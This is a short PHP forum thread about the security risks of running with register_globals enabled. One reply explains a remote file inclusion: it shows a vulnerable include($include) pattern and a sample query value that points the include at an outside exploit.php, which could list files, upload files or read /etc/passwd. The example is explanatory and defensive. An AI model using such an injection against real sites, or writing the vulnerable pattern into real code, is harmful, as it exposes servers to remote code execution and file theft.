::: Secure Programming in PHP - 'register_globals' off:::

jduk

Hi everyone,

I am just a beginer to php. I have customised and installed a shopping cart software couple of months ago. The online shop functioned very well untill last week when my hosting company changed my website to another new server. They have switched off the globals ('register_globals' are off) in their php.ini file. I am in the shared hosting with the company.

My code is not functioning properly, then I have placed a 'htaccess' file with the following code to switch the variables locally on..

php_flag register_globals on

php_flag short_open_tag on

its great, everything is perfect even the master value of 'register_globals' is set to 'off'. Now, they are botherd about this. Always promting me to change the code.

I wanna really know the freequency of security threats involved if the 'register_globals' are on? Can anybody explore really the seriousness of the problem please?

Thanks & Regards,

mtimdog

Well, depending on how your cart operates....worst case scenario for you is probly a hacker buying something for free using $_GET parameters.

drew010

the degree threat of register_globals being on is mostly placed on how good or careless the programmer is. if you have something where a file gets included based on the query string of a script like
file.php?include=main.php
and in the code it just does
include($include);
a malicious user could easily change main.php to http://www.theirsite.com/exploit.php
where exploit.php contains code for listing files in a directory, perhaps upload capability or showing the source of your files or even trying to do /etc/passwd (which will have minimal effect if you aren't root)
if it is a large commercial shopping script, chances are there is no bad code in it that would allow something like this to happen.

jduk

Hi,

Thanks for the replies. I am using a large shoping cart script, with multiple features. I will let you know weather you want to have a quick look at the URL please.